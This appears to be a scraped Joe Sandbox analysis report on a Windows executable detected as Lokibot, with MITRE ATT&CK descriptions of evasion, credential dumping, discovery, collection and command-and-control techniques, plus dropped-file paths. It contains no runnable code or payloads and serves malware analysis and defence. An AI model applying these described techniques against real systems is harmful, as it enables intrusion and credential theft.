Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SIV50C2VQTB0P0PT_c32e84ebc64fed548d6828e72decc9907242fb41_3d54c267_e087f265-1305-4ae3-80f3-8ef54b7d0dee\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63DD.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6555.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6575.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Windows Analysis Report
Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Function 07C97A20 Relevance: 4.0, Strings: 3, Instructions: 201
COMMON

Function 07C89C88 Relevance: 1.9, APIs: 1, Instructions: 368
COMMON

Function 0568B814 Relevance: 2.7, Strings: 2, Instructions: 215
COMMON

Function 05689BD8 Relevance: 2.7, Strings: 2, Instructions: 193
COMMON

Function 05684AD0 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Function 07C9A200 Relevance: 2.6, Strings: 2, Instructions: 63
COMMON

Function 07C8619D Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Function 07C861A8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 02E9BCB8 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Function 055A2804 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre